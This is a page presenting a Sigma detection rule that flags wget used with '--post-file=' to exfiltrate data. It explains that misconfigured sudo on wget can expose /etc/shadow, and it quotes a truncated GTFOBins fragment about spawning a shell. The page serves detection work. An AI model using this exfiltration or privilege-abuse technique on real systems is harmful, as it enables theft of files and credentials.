Data Exfiltration with Wget
Detects attempts to post the file with the usage of wget utility. The adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow.
Sigma rule (View on GitHub)
1title: Data Exfiltration with Wget
2id: cb39d16b-b3b6-4a7a-8222-1cf24b686ffc
3status: test
4description: |
5 Detects attempts to post the file with the usage of wget utility.
6 The adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow.
7references:
8 - https://linux.die.net/man/1/wget
9 - https://gtfobins.github.io/gtfobins/wget/
10author: 'Pawel Mazur'
11date: 2021-11-18
12modified: 2022-12-25
13tags:
14 - attack.exfiltration
15 - attack.t1048.003
16logsource:
17 product: linux
18 service: auditd
19detection:
20 selection:
21 type: EXECVE
22 a0: wget
23 a1|startswith: '--post-file='
24 condition: selection
25falsepositives:
26 - Legitimate usage of wget utility to post a file
27level: medium
References
-
.. / wget Shell File upload File download File write File read SUID Sudo Shell It can be used to break out from restricted environments by spawning an interactive system shell. TF=$(mktemp) chmod +...
Read More
Related rules
- PowerShell ICMP Exfiltration
- Suspicious DNS Query with B64 Encoded String
- Suspicious Outbound SMTP Connections
- Suspicious WebDav Client Execution Via Rundll32.EXE
- WebDav Client Execution Via Rundll32.EXE